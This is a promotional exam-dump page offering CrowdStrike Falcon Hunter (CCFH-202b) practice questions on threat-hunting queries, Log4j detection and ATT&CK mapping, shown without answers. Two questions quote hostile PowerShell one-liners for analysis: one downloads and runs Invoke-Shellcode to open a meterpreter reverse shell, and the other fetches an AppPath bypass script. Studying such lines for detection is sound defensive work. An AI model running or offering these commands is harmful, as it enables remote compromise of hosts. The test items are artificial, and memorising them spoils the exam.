Spring Sale Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: buysanta

Exact2Pass Menu

CrowdStrike Certified Falcon Hunter

Last Update 1 hour ago Total Questions : 60

The CrowdStrike Certified Falcon Hunter content is now fully updated, with all current exam questions added 1 hour ago. Deciding to include CCFH-202b practice exam questions in your study plan goes far beyond basic test preparation.

You'll find that our CCFH-202b exam questions frequently feature detailed scenarios and practical problem-solving exercises that directly mirror industry challenges. Engaging with these CCFH-202b sample sets allows you to effectively manage your time and pace yourself, giving you the ability to finish any CrowdStrike Certified Falcon Hunter practice test comfortably within the allotted time.

Question # 4

What is the expected result of this CQL query?

#event_simpleName=UserLogon RemoteAddressIP4=* | !cidr(RemoteAddressIP4, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/32"]) | ipLocation(field=RemoteAddressIP4, as="ip")

A.

All remote user network connection events from external IP addresses

B.

All remote user network connection events from internal IP addresses

C.

All user logons originating from internal IP addresses

D.

All user logons originating from external IP addresses

Question # 5

Which action helps identify an enterprise-wide file infection?

A.

Monitor the Falcon Console for alerts on suspicious process activity

B.

Analyze the Investigate Host dashboard to identify endpoints with high-risk file activity

C.

Utilize CrowdStrike Query Language (CQL) to search for files with the same hashes that have been renamed

D.

Utilize the IP addresses Investigate dashboard to find the hosts' processes that are connecting to an unusual IP

Question # 6

You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:

powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force

What is this command doing?

A.

Using PowerShell to perform a discovery scan of 172.17.0.21 on port 8080

B.

Utilizing PowerShell to force a connection to a reverse shell originating from GitHub

C.

Utilizing PowerShell to download a reverse shell from GitHub and executing it to create a connection

D.

Using WMI to update the PowerShell execution policy on a remote host

Question # 7

You are investigating a compromise on a Linux host. You suspect that the host is running an older version of Apache and that the Log4j (CVE-2021-44228) vulnerability is being exploited using JNDI lookups. Which CQL query could you use to determine if Log4j is the root cause of the compromise?

A.

ExternalApiType=Event_DetectionSummaryEvent DetectionDescription=/log4j/i

B.

#event_simpleName=HttpRequest | HttpRequestHeader=/.*jndi:\w{1,5}:?\}?\/\/.*\)/i

C.

#event_simpleName=Cve-Detection | Cve-Number="CVE-2021-44228"

D.

#event_simpleName=ScriptControlDetectInfo ScriptContent=/.*jndi:\w{1,5}:?\}?\/\/.*\}/i

Question # 8

Which CQL query would output relevant data in tracking USB storage device usage?

A.

#event_simpleName=RemovableMediaVolumeMounted | table([@timestamp, ComputerName, VolumeDriveLetter, VolumeFileSystemDevice, VolumeFileSystemDriver])

B.

#event_simpleName=RemovableMediaVolumeMounted | table([RemoteAddressIP4, UserName, ParentProcessId, RawProcessId, TargetProcessId, FileName, MD5HashData, SHA256HashData, aid, cid])

C.

#event_simpleName=ProcessRollup2 event_platform=Win | table(["Host Name", "Connection Type", "Manufacturer", "Product Name", "Description", "Device ID", Time])

D.

#event_simpleName=FsVolumeMounted | table([@source, ComputerName, VolumeName, VolumeFileSystemType, Entitlements, VolumeDriveLetter])

Question # 9

While performing a hunt for unusual PowerShell commands, you discover the following command being run on a single host:

powershell.exe "(New-Object Net.webclient).Downloadstring('https://raw.githubusercontent.com/.../invoke-AppPathBypass.ps1')"

The process tree for this command looks like this:

winlogon.exe > userinit.exe > explorer.exe > powershell_ise.exe > powershell.exe All of the commands are run during normal working hours under the account of a user from the IT department. What should be your next steps in the investigation?

A.

Start an RTR (Real Time Response) session on the host. Check the user's Downloads folder for the file AppPathBypass.ps1 and analyze the file for malicious content.

B.

Mark the detection as True Positive. Trigger an automated remediation to remove all malicious files and methods of persistence.

C.

Mark the detection as a False Positive because nothing happened on the host.

D.

Perform a +/- 10-minute search for events around this process execution to get more context. Contact the user to confirm whether or not this was testing-related activity.

Question # 10

An attacker created a scheduled task which executes a remote management application. Which MITRE ATT & CK Matrix for Enterprise stage is this an example of?

A.

Persistence

B.

Lateral Movement

C.

Privilege Escalation

D.

Gaining Access

Go to page: